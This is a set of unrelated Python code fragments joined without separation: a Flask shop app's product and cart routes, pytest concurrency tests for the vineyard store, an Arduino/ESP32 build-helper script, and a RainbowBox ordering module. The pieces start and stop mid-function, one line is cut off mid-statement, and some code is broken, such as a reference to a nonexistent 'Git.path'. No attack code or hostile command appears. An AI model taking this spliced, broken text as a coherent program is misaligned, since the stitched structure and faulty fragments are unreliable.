if form.validate_on_submit() and Uploadfield.validate_on_submit():
products_dict = {}
db = shelve.open('ProductStorage.db', 'c')
try:
products_dict = db['Products']
except:
print("Error in retrieving Products from ProductStorage.db.")
image = request.files[Uploadfield.productImage.name]
# product is an object
product = Products.Products(form.productName.data, form.productPrice.data.quantize(Decimal("0.01")), form.productDescription.data, form.stock.data)
img_extension = image.filename.split('.')[-1]
print(img_extension)
image_name = str(product.get_products_id()) + '.' + str(img_extension)
print(image_name)
image.save(os.path.join(os.getcwd(), 'static', 'img', image_name))
product.set_image(image_name)
products_dict[product.get_products_id()] = product
db['Products'] = products_dict
db.close()
print(product.get_products_id(), flush=True)
return redirect(url_for('store_manage'))
return render_template('storeManage/uploadProduct.html', form=form, Uploadfield=Uploadfield)
# EditProduct
@app.route('/editProduct/<id>', methods=['GET', 'POST'])
def edit_product(id):
Editproduct = Createproduct()
print(id, flush=True)
print("Form done", flush=True)
if request.method == 'POST' and Editproduct.validate():
products_dict = {}
db = shelve.open('ProductStorage.db', 'w')
products_dict = db['Products']
product = products_dict.get(id)
image = request.files[Editproduct.updateImage.name]
# product is an object
if image.filename:
img_extension = image.filename.split('.')[-1]
image_name = str(product.get_products_id()) + '.' + str(img_extension)
print(image_name)
image.save(os.path.join(os.getcwd(), 'static', 'img', image_name))
product.set_image(image_name)
product.set_name(Editproduct.productName.data)
product.set_price(Editproduct.productPrice.data.quantize(Decimal("0.01")))
product.set_description(Editproduct.productDescription.data)
product.set_stock(Editproduct.stock.data)
db['Products'] = products_dict
db.close()
return redirect(url_for('store_manage'))
else:
products_dict = {}
db = shelve.open('ProductStorage.db', 'r')
products_dict = db['Products']
db.close()
product = products_dict.get(id)
image = product.get_image()
Editproduct.productName.data = product.get_name()
Editproduct.productPrice.data = product.get_price()
Editproduct.productDescription.data = product.get_description()
Editproduct.stock.data = product.get_stock()
return render_template('storeManage/editProduct.html', form=Editproduct, image=image)
# DeleteProduct
@app.route('/deleteProduct/<id>', methods=['POST'])
def delete_products(id):
products_dict = {}
db = shelve.open('ProductStorage.db', 'w')
products_dict = db['Products']
image = products_dict[id].get_image()
os.remove(os.path.join(os.getcwd(), 'static', 'img', image))
products_dict.pop(id)
db['Products'] = products_dict
db.close()
return redirect(url_for('store_manage'))
# ViewProductStore
@app.route('/storeView/<id>/', methods=['GET'])
def store_view(id):
db = shelve.open('ProductStorage.db', 'c')
try:
products_dict = db['Products']
except KeyError:
print('error retrieving products dict')
products_dict = {}
print(products_dict, flush=True)
product = products_dict[id]
return render_template('storeManage/storeView.html', product=product)
# ViewProductCustomer
@app.route('/customerView/<id>/', methods=['GET'])
def customer_view(id):
db = shelve.open('ProductStorage.db', 'c')
try:
products_dict = db['Products']
except KeyError:
print('error retrieving products dict')
products_dict = {}
print(products_dict, flush=True)
product = products_dict[id]
return render_template('storeManage/customerView.html', product=product)
# ViewStoreCustomer
@app.route('/customerProduct', methods=['GET'])
def customer_product():
db = shelve.open('ProductStorage.db', 'c')
try:
products_dict = db['Products']
except KeyError:
print('error retrieving products dict')
products_dict = {}
print(products_dict, flush=True)
products_list = []
for key in products_dict:
print(key, flush=True)
product = products_dict[key]
products_list.append(product)
print(product, flush=True)
print(products_list, flush=True)
return render_template('storeManage/customerProduct.html', products_list=products_list)
# <------------------------------------------------------->
# <---------------- Michael SHopping Cart ---------------->
# <------------------------------------------------------->
@app.route('/addCart/<id>/<int:qty>', methods=['GET'])
def addCart(id, qty):
try:
user_id = session['user_id']
product_id = id
quantity = qty
if request.method == 'GET':
product_dict = {}
try:
db = shelve.open('ProductStorage.db', 'r')
product_dict = db['Products']
except:
print("Error in retrieving Users from storage.db.")
item = product_dict[product_id]
cart_dict = {}
try:
db = shelve.open('cart.db', 'c')
cart_dict = db['cart']
except:
print("Error in retrieving Users from cart.db.")
inCartAlr = 0
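            # Look up the user's cart and check whether this product is already in it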
            user_cart = cart_dict.get(user_id, {})  # default to an empty cart for first-time users
for key in user_cart:
if product_id == key:
inCartAlr = 1
if inCartAlr == 1:
item = user_cart[product_id]
Nqty = item.add_qty(qty)
total = item.set_total(Nqty)
user_cart[item.get_products_id()] = item
cart_dict[user_id] = user_cart
db['cart'] = cart_dict
db.close()
else:
item.set_qty(qty)
total = item.set_total(qty)
user_cart[item.get_products_id()] = item
cart_dict[user_id] = user_cart
db['cart'] = cart_dict
db.close()
return redirect(url_for('Cart'))
#! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2020-2021 Alibaba Group Holding Limited.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import itertools
import json
import logging
import multiprocessing
import random
import threading
import time
import traceback
from concurrent.futures import ThreadPoolExecutor
import numpy as np
import pandas as pd
import pytest
import vineyard
from vineyard.core import default_builder_context
from vineyard.core import default_resolver_context
from vineyard.data import register_builtin_types
register_builtin_types(default_builder_context, default_resolver_context)
logger = logging.getLogger('vineyard')
def generate_vineyard_ipc_sockets(vineyard_ipc_sockets, nclients):
return list(itertools.islice(itertools.cycle(vineyard_ipc_sockets), nclients))
def generate_vineyard_ipc_clients(vineyard_ipc_sockets, nclients):
vineyard_ipc_sockets = generate_vineyard_ipc_sockets(vineyard_ipc_sockets, nclients)
return tuple(vineyard.connect(sock) for sock in vineyard_ipc_sockets)
def test_get_after_persist(vineyard_ipc_sockets):
client1, client2 = generate_vineyard_ipc_clients(vineyard_ipc_sockets, 2)
data = np.ones((1, 2, 3, 4, 5))
o = client1.put(data)
client1.persist(o)
meta = client2.get_meta(o, True)
assert data.shape == tuple(json.loads(meta['shape_']))
def test_add_remote_placeholder(vineyard_ipc_sockets):
client1, client2, client3, client4 = generate_vineyard_ipc_clients(
vineyard_ipc_sockets, 4
)
data = np.ones((1, 2, 3, 4, 5))
o1 = client1.put(data)
o2 = client2.put(data)
o3 = client3.put(data)
o4 = client4.put(data)
client4.persist(o4)
client3.persist(o3)
client2.persist(o2)
client1.persist(o1)
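    # Assemble a global Sequence whose four members were created on different vineyard instances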
meta = vineyard.ObjectMeta()
meta['typename'] = 'vineyard::Sequence'
meta['size_'] = 4
meta.set_global(True)
meta.add_member('__elements_-0', o1)
meta.add_member('__elements_-1', o2)
meta.add_member('__elements_-2', o3)
meta.add_member('__elements_-3', o4)
meta['__elements_-size'] = 4
tup = client1.create_metadata(meta)
client1.persist(tup)
meta = client2.get_meta(tup.id, True)
assert meta['__elements_-size'] == 4
def test_add_remote_placeholder_with_sync(vineyard_ipc_sockets):
client1, client2, client3, client4 = generate_vineyard_ipc_clients(
vineyard_ipc_sockets, 4
)
data = np.ones((1, 2, 3, 4, 5))
o1 = client1.put(data)
client1.persist(o1)
time.sleep(20)
o2 = client2.put(data)
client2.persist(o2)
time.sleep(20)
o3 = client3.put(data)
client3.persist(o3)
time.sleep(20)
o4 = client4.put(data)
client4.persist(o4)
time.sleep(20)
client1.get_meta(o4)
client2.get_meta(o1)
client3.get_meta(o2)
client4.get_meta(o3)
def test_remote_deletion(vineyard_ipc_sockets):
client1, client2 = generate_vineyard_ipc_clients(vineyard_ipc_sockets, 2)
client1 = vineyard.connect(vineyard_ipc_sockets[0])
client2 = vineyard.connect(vineyard_ipc_sockets[1])
old_status = client1.status
data = np.ones((1, 2, 3, 4, 5))
o1 = client1.put(data)
client1.persist(o1)
new_status = client1.status
assert old_status.memory_limit == new_status.memory_limit
assert old_status.memory_usage != new_status.memory_usage
client2.get_meta(o1, sync_remote=True)
client2.delete(o1)
client1.sync_meta()
new_status = client1.status
assert old_status.memory_limit == new_status.memory_limit
assert old_status.memory_usage == new_status.memory_usage
def test_concurrent_blob(vineyard_ipc_sockets):
client1, client2, client3, client4 = generate_vineyard_ipc_clients(
vineyard_ipc_sockets, 4
)
    # FIXME: test concurrent blob creation and destruction
print(client1)
print(client2)
print(client3)
print(client4)
def test_concurrent_meta(vineyard_ipc_sockets): # noqa: C901
clients = generate_vineyard_ipc_clients(vineyard_ipc_sockets, 4)
def job1(client):
try:
o = client.get_object(client.put(1))
if random.random() > 0.5:
client.delete(o.id)
except Exception as e: # pylint: disable=broad-except
pytest.fail('failed: %s' % e)
return False
return True
def job2(client):
try:
o = client.get_object(client.put(1.23456))
if random.random() > 0.5:
client.delete(o.id)
except Exception as e: # pylint: disable=broad-except
pytest.fail('failed: %s' % e)
return False
return True
def job3(client):
try:
o = client.get_object(client.put('xxxxabcd'))
if random.random() > 0.5:
client.delete(o.id)
except Exception as e: # pylint: disable=broad-except
pytest.fail('failed: %s' % e)
return False
return True
def job4(client):
try:
o = client.get_object(client.put((1, 1.2345)))
if random.random() > 0.5:
client.delete(o.id)
except Exception as e: # pylint: disable=broad-except
pytest.fail('failed: %s' % e)
return False
return True
def job5(client):
try:
o = client.get_object(client.put((1, 1.2345, 'xxxxabcd')))
if random.random() > 0.5:
client.delete(o.id)
except Exception as e: # pylint: disable=broad-except
pytest.fail('failed: %s' % e)
return False
return True
jobs = [job1, job2, job3, job4, job5]
with ThreadPoolExecutor(32) as executor:
fs, rs = [], []
for _ in range(1024):
job = random.choice(jobs)
client = random.choice(clients)
fs.append(executor.submit(job, client))
for future in fs:
rs.append(future.result())
if not all(rs):
pytest.fail("Failed to execute tests ...")
def test_concurrent_meta_mp(vineyard_ipc_sockets): # noqa: C901
num_proc = 8
job_per_proc = 64
vineyard_ipc_sockets = generate_vineyard_ipc_sockets(vineyard_ipc_sockets, num_proc)
def job1(rs, state, client):
try:
o = client.get_object(client.put(1))
# client.persist(o.id)
if random.random() > 0.5:
client.delete(o.id)
else:
client.sync_meta()
except Exception as e: # pylint: disable=broad-except
print('failed with %r: %s' % (o, e), flush=True)
traceback.print_exc()
state.value = -1
rs.put((False, 'failed: %s' % e))
else:
rs.put((True, ''))
finally:
print('job finished', flush=True)
def job2(rs, state, client):
try:
o = client.get_object(client.put(1.23456))
# client.persist(o.id)
if random.random() > 0.5:
client.delete(o.id)
else:
client.sync_meta()
except Exception as e: # pylint: disable=broad-except
print('failed with %r: %s' % (o, e), flush=True)
traceback.print_exc()
state.value = -1
rs.put((False, 'failed: %s' % e))
else:
rs.put((True, ''))
finally:
print('job finished', flush=True)
def job3(rs, state, client):
try:
o = client.get_object(client.put('xxxxabcd'))
# client.persist(o.id)
if random.random() > 0.5:
client.delete(o.id)
else:
client.sync_meta()
except Exception as e: # pylint: disable=broad-except
print('failed with %r: %s' % (o, e), flush=True)
traceback.print_exc()
state.value = -1
rs.put((False, 'failed: %s' % e))
else:
rs.put((True, ''))
finally:
print('job finished', flush=True)
def job4(rs, state, client):
try:
o = client.get_object(client.put((1, 1.2345)))
# client.persist(o.id)
if random.random() > 0.5:
client.delete(o.id)
else:
client.sync_meta()
except Exception as e: # pylint: disable=broad-except
print('failed with %r: %s' % (o, e), flush=True)
traceback.print_exc()
state.value = -1
rs.put((False, 'failed: %s' % e))
else:
rs.put((True, ''))
finally:
print('job finished', flush=True)
def job5(rs, state, client):
try:
o = client.get_object(client.put((1, 1.2345, 'xxxxabcd')))
# client.persist(o.id)
if random.random() > 0.5:
client.delete(o.id)
else:
client.sync_meta()
except Exception as e: # pylint: disable=broad-except
print('failed with %r: %s' % (o, e), flush=True)
traceback.print_exc()
state.value = -1
rs.put((False, 'failed: %s' % e))
else:
rs.put((True, ''))
finally:
print('job finished', flush=True)
def start_requests(rs, state, ipc_socket):
jobs = [job1, job2, job3, job4, job5]
client = vineyard.connect(ipc_socket).fork()
for _ in range(job_per_proc):
if state.value != 0:
break
job = random.choice(jobs)
job(rs, state, client)
ctx = multiprocessing.get_context(method='fork')
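    # rs collects one (ok, message) tuple per job; state is a shared flag that
    # makes every worker stop early once any job has failed.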
procs, rs, state = [], ctx.Queue(), ctx.Value('i', 0)
for sock in vineyard_ipc_sockets:
proc = ctx.Process(
target=start_requests,
args=(
rs,
state,
sock,
),
)
proc.start()
procs.append(proc)
for _ in range(num_proc * job_per_proc):
r, message = rs.get(block=True)
if not r:
pytest.fail(message)
def test_concurrent_persist(vineyard_ipc_sockets): # noqa: C901
clients = generate_vineyard_ipc_clients(vineyard_ipc_sockets, 4)
def job1(client):
try:
o = client.get_object(client.put(1))
client.persist(o.id)
if random.random() > 0.5:
client.delete(o.id)
else:
client.sync_meta()
except Exception as e: # pylint: disable=broad-except
pytest.fail('failed: %s' % e)
return False
return True
def job2(client):
try:
o = client.get_object(client.put(1.23456))
client.persist(o.id)
if random.random() > 0.5:
client.delete(o.id)
else:
client.sync_meta()
except Exception as e: # pylint: disable=broad-except
pytest.fail('failed: %s' % e)
return False
return True
def job3(client):
try:
o = client.get_object(client.put('xxxxabcd'))
client.persist(o.id)
if random.random() > 0.5:
client.delete(o.id)
else:
client.sync_meta()
except Exception as e: # pylint: disable=broad-except
pytest.fail('failed: %s' % e)
return False
return True
def job4(client):
try:
o = client.get_object(client.put((1, 1.2345)))
client.persist(o.id)
if random.random() > 0.5:
client.delete(o.id)
else:
client.sync_meta()
except Exception as e: # pylint: disable=broad-except
pytest.fail('failed: %s' % e)
return False
return True
def job5(client):
try:
o = client.get_object(client.put((1, 1.2345, 'xxxxabcd')))
client.persist(o.id)
if random.random() > 0.5:
client.delete(o.id)
else:
client.sync_meta()
except Exception as e: # pylint: disable=broad-except
pytest.fail('failed: %s' % e)
return False
return True
jobs = [job1, job2, job3, job4, job5]
with ThreadPoolExecutor(16) as executor:
fs, rs = [], []
for _ in range(256):
job = random.choice(jobs)
client = random.choice(clients)
fs.append(executor.submit(job, client))
for future in fs:
rs.append(future.result())
if not all(rs):
pytest.fail("Failed to execute tests ...")
def test_concurrent_meta_sync(vineyard_ipc_sockets): # noqa: C901
num_proc = 8
job_per_proc = 128
def job1(rs, state, job_per_proc, vineyard_ipc_sockets):
sock1, sock2 = random.choices(vineyard_ipc_sockets, k=2)
client0 = vineyard.connect(sock1).fork()
client1 = vineyard.connect(sock2).fork()
for _ in range(job_per_proc):
if state.value != 0:
break
o = client0.put(1)
client0.persist(o)
try:
client1.sync_meta()
client1.get_meta(o)
client1.delete(o)
except Exception as e: # pylint: disable=broad-except
print('failed: with %r: %s' % (o, e), flush=True)
traceback.print_exc()
state.value = -1
rs.put((False, 'failed: %s' % e))
return
rs.put((True, ''))
def job2(rs, state, job_per_proc, vineyard_ipc_sockets):
sock1, sock2 = random.choices(vineyard_ipc_sockets, k=2)
client0 = vineyard.connect(sock1).fork()
client1 = vineyard.connect(sock2).fork()
for _ in range(job_per_proc):
if state.value != 0:
break
o = client0.put(1.23456)
client0.persist(o)
try:
client1.sync_meta()
client1.get_meta(o)
client1.delete(o)
except Exception as e: # pylint: disable=broad-except
print('failed: with %r: %s' % (o, e), flush=True)
traceback.print_exc()
state.value = -1
rs.put((False, 'failed: %s' % e))
return
rs.put((True, ''))
def job3(rs, state, job_per_proc, vineyard_ipc_sockets):
sock1, sock2 = random.choices(vineyard_ipc_sockets, k=2)
client0 = vineyard.connect(sock1).fork()
client1 = vineyard.connect(sock2).fork()
for _ in range(job_per_proc):
if state.value != 0:
break
o = client0.put('xxxxabcd')
client0.persist(o)
try:
client1.sync_meta()
client1.get_meta(o)
client1.delete(o)
except Exception as e: # pylint: disable=broad-except
print('failed: with %r: %s' % (o, e), flush=True)
traceback.print_exc()
state.value = -1
rs.put((False, 'failed: %s' % e))
return
rs.put((True, ''))
def job4(rs, state, job_per_proc, vineyard_ipc_sockets):
sock1, sock2 = random.choices(vineyard_ipc_sockets, k=2)
client0 = vineyard.connect(sock1).fork()
client1 = vineyard.connect(sock2).fork()
for _ in range(job_per_proc):
if state.value != 0:
break
o = client0.put((1, 1.2345))
client0.persist(o)
try:
client1.sync_meta()
client1.get_meta(o)
client1.delete(o)
            except Exception as e: # pylint: disable=broad-except
                print('failed: with %r: %s' % (o, e), flush=True)
                traceback.print_exc()
                state.value = -1
                rs.put((False, 'failed: %s' % e))
                return
        rs.put((True, ''))
#!/usr/bin/env python3
import argparse
import binascii
import collections.abc
import contextlib
import errno
import itertools
import json
import logging
import os
import pickle
import platform
import queue
import shutil
import subprocess
import sys
import threading
import time
from multiprocessing import Process, cpu_count
import serial.tools.list_ports as serial_list_ports
from serial import Serial as PySerial
from serial import serialutil
root = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))
external = os.path.join(root, 'external')
lib_path = os.path.join(root, 'arduino-libs')
out = os.path.join(root, 'out')
class ProcStreamReader(object):
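    """Drain a subprocess's stdout/stderr on background threads.

    Each line is pushed onto an internal queue (and forwarded to any extra
    handlers) so callers can poll output without risking a pipe-buffer deadlock.
    """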
__STREAMS = {"stdout", "stderr"}
def __init__(self, p, handlers=None):
self.p = p
self.__qs = {n: queue.Queue() for n in self.__STREAMS}
if handlers is None:
handlers = dict()
_handlers = {
n: tuple(e for e in (self.__qs[n].put, handlers.get(n)) if e)
for n in self.__STREAMS
}
for n in self.__STREAMS:
threading.Thread(
target=self.__qloop, args=(getattr(self.p, n), _handlers[n])
).start()
@staticmethod
def __qloop(fobj, handlers):
for l in map(str.strip, fobj or tuple()):
for h in handlers:
h(l)
def __get_line(self, fobj_name):
try:
return self.__qs[fobj_name].get(timeout=1)
except queue.Empty:
return None
def stdout_read_line(self):
return self.__get_line("stdout")
def stderr_read_line(self):
return self.__get_line("stderr")
class Logger(object):
def __init__(self):
root = logging.getLogger()
root.setLevel(logging.DEBUG)
handler = logging.StreamHandler(sys.stderr)
handler.setLevel(logging.DEBUG)
formatter = logging.Formatter('[%(asctime)s] [%(name)s/%(levelname)s] %(message)s',
'%Y-%m-%d %H:%M:%S')
handler.setFormatter(formatter)
root.addHandler(handler)
self.logger = root
self.scope_name = None
self.scopes = []
def __call__(self, scope_name):
self.scope_name = scope_name
return self
def __enter__(self):
scope_name = self.scope_name
self.scopes.append(scope_name)
scopes_dedup = list()
for scope in self.scopes:
if scope not in scopes_dedup:
scopes_dedup.append(scope)
self.set_name('/'.join(scopes_dedup))
return self
def __exit__(self, *args, **kwargs):
self.scopes = self.scopes[:-1]
scopes_dedup = list()
for scope in self.scopes:
if scope not in scopes_dedup:
scopes_dedup.append(scope)
self.set_name('/'.join(scopes_dedup))
return
def set_name(self, name):
self.logger.name = name
def debug(self, *args, **kwargs):
self.logger.debug(*args, **kwargs)
def info(self, *args, **kwargs):
self.logger.info(*args, **kwargs)
def warn(self, *args, **kwargs):
self.logger.warning(*args, **kwargs)
def warning(self, *args, **kwargs):
self.logger.warning(*args, **kwargs)
def error(self, *args, **kwargs):
self.logger.error(*args, **kwargs)
def command(self, *args, **kwargs):
self.logger.info("Running %r", args[0])
kwargs.setdefault('stdout', subprocess.PIPE)
kwargs.setdefault('stderr', subprocess.PIPE)
kwargs.setdefault('universal_newlines', True)
kwargs.setdefault('bufsize', 0)
env = os.environ.copy()
env.update(kwargs.pop('env', None) or {})
process = subprocess.Popen(*args, **kwargs, env=env)
ProcStreamReader(process, handlers={
"stdout": self.logger.info, "stderr": self.logger.error,
})
# If we don't specify a timeout, this tends to confuse the logger and
# end up blocking forever - probably something to do with our reader
# threads
return process.wait(timeout=600)
log = Logger()
class Wsl(object):
def __init__(self):
pass
def is_wsl(self):
with log('win'):
if os.name == 'nt':
return False
if os.path.exists('/mnt/c/Windows'):
return True
if os.environ.get('WSL_DISTRO_NAME'):
raise Exception("Please restart WSL with 'wsl.exe --shutdown' in command prompt")
return False
def comports(self):
with log('win'):
cmd = 'import serial.tools.list_ports; import pickle; import binascii; print(binascii.b2a_base64(pickle.dumps(list(serial.tools.list_ports.comports()))).decode())'
out = subprocess.check_output(['py.exe', '-3', '-c', cmd]).decode().strip()
return pickle.loads(binascii.a2b_base64(out))
@property
def environ(self):
with log('win'):
_environ = dict()
out = subprocess.check_output(['cmd.exe', '/c', 'set'], stderr=subprocess.DEVNULL).decode().strip()
for line in out.split('\n'):
line = line.strip()
if line == '':
continue
items = line.split('=')
key = items[0]
value = '='.join(items[1:])
_environ[key] = value
return _environ
def command(self, args):
with log('win'):
if args[0] == 'python3':
new_args = ['py.exe', '-3']
new_args.extend(args[1:])
return log.command(new_args)
args_pickle_hex = binascii.b2a_base64(pickle.dumps(args)).decode().strip()
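            # The argument list is pickled and base64-encoded so it survives Windows
            # command-line quoting; the inline helper script run by py.exe decodes it
            # and re-executes the command, forwarding its output and exit code.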
cmd = "import sys; import subprocess; import pickle; import binascii; "
cmd += "args = pickle.loads(binascii.a2b_base64('{}')); ".format(args_pickle_hex)
cmd += "p = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE); "
cmd += "a, b = p.communicate(); print(a.decode()); print(b.decode()); sys.exit(p.returncode); "
args = ['py.exe', '-3', '-c', cmd]
return log.command(args)
def copy_to_windows(self, path):
with log('win'):
if not os.path.exists('/mnt/c/tmp'):
os.mkdir('/mnt/c/tmp')
name = os.path.basename(path)
dst = os.path.join('/mnt/c/tmp', name)
winpath = 'c:\\tmp\\' + name
if os.path.exists(dst):
os.remove(dst)
shutil.copyfile(path, dst)
assert os.path.exists(dst)
return winpath
def path_on_windows(self, path):
with log('win'):
path = os.path.realpath(path)
share = '\\\\wsl$\\{}'.format(os.environ['WSL_DISTRO_NAME'])
path = path.replace('~/', '{}/'.format(os.environ['HOME']))
path = path.replace('/', '\\')
path = share + path
return path
def path_in_wsl(self, path):
path = path.replace('\\', '/')
if path.lower().startswith('//wsl$'):
path = '/' + '/'.join(path.split('/')[4:])
return path
wsl = Wsl()
class SerialPortNotFoundError(Exception):
pass
class Serial(object):
def __init__(self, serial=None):
self.ports = None
self.serial = serial
self.line = None
def clear_cache(self):
self.ports = None
def comports(self):
with log('serial'):
if isinstance(self.ports, list):
return self.ports
if not wsl.is_wsl():
self.ports = list(serial_list_ports.comports())
else:
self.ports = wsl.comports()
for port in self.ports:
if port.device.startswith('c'):
port.device = port.device.upper()
return self.ports
def find(self, description):
with log('serial'):
for port in self.comports():
if port.description.lower().find(description.lower()) != -1:
log.info('{} {}'.format(port.device, port.description))
return port.device
raise SerialPortNotFoundError
def __call__(self, *args, **kwargs):
serial = PySerial(*args, **kwargs, timeout=1)
return self.__class__(serial)
def __enter__(self, *args, **kwargs):
self.serial.__enter__(*args, **kwargs)
return self
def __exit__(self, *args, **kwargs):
return self.serial.__exit__(*args, **kwargs)
def read(self, size=1, block=True):
if block:
return self.serial.read(size)
data = b''
while self.serial.in_waiting and len(data) < size:
data += self.serial.read(1)
if len(data) == 0:
return None
return data
def readline(self, block=True):
if block:
data = b''
while not data.endswith(b'\r\n'):
data += self.read()
return data
data = b''
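        # Resume from any partial line buffered by a previous non-blocking call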
if self.line:
data = self.line
self.line = None
while True:
x = self.read(block=False)
            if x is None:
break
data += x
if data.endswith(b'\r\n'):
break
if data.endswith(b'\r\n'):
return data
self.line = data
return None
serial = Serial()
class FakeSerial(object):
def __init__(self):
self.line = None
def __call__(self, *args, **kwargs):
return self.__class__()
def __enter__(self, *args, **kwargs):
return self
def __exit__(self, *args, **kwargs):
return
def read(self, size=1, block=True):
if block:
raise NotImplementedError("Would block forever, this is a fake device")
return None
def readline(self, block=True):
if block:
data = b''
while not data.endswith(b'\r\n'):
data += self.read()
return data
data = b''
if self.line:
data = self.line
self.line = None
while True:
x = self.read(block=False)
            if x is None:
break
data += x
if data.endswith(b'\r\n'):
break
if data.endswith(b'\r\n'):
return data
self.line = data
return None
class Git(object):
def __init__(self, path='git'):
self.path = path
def check(self):
with log('git'):
# Confirm that we have `git` at all
assert log.command([self.path, '--version']) == 0
# Confirm that we can contact a remote
if log.command(
[self.path, 'ls-remote'], stdout=subprocess.DEVNULL,
start_new_session=True,
) != 0:
log.error(
"Unable to connect to the git remote - "
"skipping submodule update checks."
)
return False
return True
def init_submodules(self, *paths):
with log('git'):
log.info("Updating submodules...please wait..")
args = [
self.path, 'submodule', 'update', '--init', '--recursive',
"--", *paths,
]
if 0 != log.command(args):
raise Exception(' '.join(args))
git = Git()
class GitLFS(object):
def __init__(self, path="git-lfs"):
self.path = path
def check(self):
with log("git-lfs"):
# Confirm that we have `git-lfs` at all
if not log.command([self.path, "--version"]):
log.error("git-lfs program not found - unable to proceed")
raise FileNotFoundError(self.path)
# We prefer for the user to have installed the hooks as well but
# will only warn them if they haven't
if not log.command([Git.path, "lfs", "--version"]):
log.warning(
"git-lfs hooks not installed - "
"your working tree will be marked as changed when "
"LFS pointers are replaced with their corresponding files."
)
def checkout(self):
with log("git-lfs"):
for action in {"fetch", "checkout"}:
log.info("%s LFS files", action.title())
cmd = (self.path, action)
rv = log.command(cmd)
if rv != 0:
log.error("Failed to %s LFS files", action)
raise subprocess.CalledProcessError(rv, cmd)
lfs = GitLFS()
class CMake(object):
def __init__(self, path='cmake', default='Unix Makefiles'):
self.path = path
self.default = default
def check(self):
with log('cmake'):
log.command([self.path, '--version'])
def generate(
self, path, out,
generator=None, toolchain=None, debug=False,
defines=None, environ=None,
):
with log('cmake'):
if not generator:
                generator = self.default
if toolchain:
toolchain = os.path.abspath(toolchain)
if not os.path.exists(toolchain):
raise FileNotFoundError(toolchain)
path = os.path.abspath(path)
if not os.path.exists(path):
raise FileNotFoundError(path)
if not os.path.exists(out):
os.makedirs(out)
assert os.path.exists(out)
if not defines:
defines = list()
if toolchain:
defines.append(('CMAKE_TOOLCHAIN_FILE', toolchain))
defines.append(
("CMAKE_BUILD_TYPE", "Debug" if debug else "Release")
)
args = ['cmake']
for key, value in defines:
define = '-D{}'.format(key)
if value:
define = '{}={}'.format(define, value)
args.append(define)
args.extend(['-G', generator])
args.append(path)
if 0 != log.command(args, env=environ, cwd=out):
raise Exception(' '.join(args))
cmake = CMake()
class Make(object):
def __init__(self, path='make'):
self.path = path
def check(self):
with log('make'):
log.command([self.path, '--version'])
def build(self, path, environ=None, cores=None):
with log('make'):
if not os.path.exists(path):
raise FileNotFoundError(path)
args = ['make']
if cores:
args.append('-j{}'.format(cores))
assert 0 == log.command(args, cwd=path, env=environ)
make = Make()
class Wget(object):
def __init__(self, path='wget'):
self.path = path
def check(self):
with log('wget'):
log.command([self.path, '--version'])
def download(self, url, out):
with log('wget'):
if os.path.exists(out):
os.remove(out)
args = ['wget', '-O', out, url]
p = subprocess.Popen(args)
p.communicate()
if 0 != p.returncode:
raise Exception(' '.join(args))
wget = Wget()
class Tar(object):
def __init__(self, path='tar'):
self.path = path
def check(self):
with log('tar'):
log.command([self.path, '--version'])
def extract(self, path, out=None):
with log('tar'):
if out:
raise NotImplementedError
path = os.path.abspath(path)
if not os.path.exists(path):
raise FileNotFoundError(path)
cwd = os.path.dirname(path)
args = ['tar', 'xf', path]
p = subprocess.Popen(args, cwd=cwd)
p.communicate()
if 0 != p.returncode:
raise Exception(' '.join(args))
tar = Tar()
class XtensaTools(object):
URL = 'https://dl.espressif.com/dl/xtensa-esp32-elf-gcc8_2_0-esp32-2019r1-rc2-linux-amd64.tar.xz'
def __init__(self):
self.url = self.URL
        self.xtena_sdk
# -*- coding: utf-8 -*-
# RainbowBox
# Copyright (C) 2015-2016 <NAME>
# LIMICS (Laboratoire d'informatique médicale et d'ingénierie des connaissances en santé), UMR_S 1142
# University Paris 13, Sorbonne paris-Cité, Bobigny, France
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys, random
#from rainbowbox.order_base import *
from order_base import *
def best_elements_order(relations, elements = None, filter_order = None):
return best_elements_order_heuristic(relations, elements, filter_order)
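# A minimal usage sketch, assuming the Relation/Element helpers provided by
# order_base (not shown in this file):
#
#   relations = [Relation(element, prop) for element, prop in pairs]
#   order = best_elements_order(relations)
#
# 'Relation' and 'pairs' above are illustrative assumptions, not part of this module.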
def best_elements_order_np(relations, elements = None, filter_order = None, additional_criteria = None):
present_elements, present_element_groups, properties, property_groups, element_2_property_2_relation, property_2_element_2_relation = relations_2_model(relations)
if not elements: elements = present_elements
if not additional_criteria: additional_criteria = lambda order: 0
element_groups = []
element_group_set = { None }
for element in elements:
if not element.group in element_group_set:
element_groups.append(element.group)
element_group_set.add(element.group)
if len(elements) == 1: return elements
for property in properties[:]:
nb = len(property_2_element_2_relation[property])
if nb <= 1: properties.remove(property) # Present for one element => does not influence best order
elif nb == len(elements): properties.remove(property) # Present for all elements => does not influence best order
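    # coocurrences[S] counts the properties shared by every element of subset S;
    # an order's score below sums these counts over all of its contiguous sublists.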
coocurrences = {}
for subset in all_subsets(elements):
if (len(subset) <= 1) or (len(subset) == len(elements)): continue
subset = frozenset(subset)
coocurrences[subset] = 0
for property in properties:
for element in subset:
if not element in property_2_element_2_relation[property]: break
else: coocurrences[subset] += 1
if element_groups: elements_by_group = [all_orders(group.children) for group in element_groups]
else: elements_by_group = [all_orders(elements)]
orders = all_combinations(elements_by_group)
best_score = -1
for order in orders:
if filter_order and not filter_order(order): continue
score = 0
for sublist in all_sublists(order):
if (len(sublist) <= 1) or (len(sublist) == len(elements)): continue
subset = frozenset(sublist)
score += coocurrences[subset]
if score > best_score:
best_score = score
best_order = order
return best_order
def best_elements_order_np_hole(relations, elements = None, filter_order = None, custom_score_order = None):
present_elements, present_element_groups, properties, property_groups, element_2_property_2_relation, property_2_element_2_relation = relations_2_model(relations)
if not elements: elements = present_elements
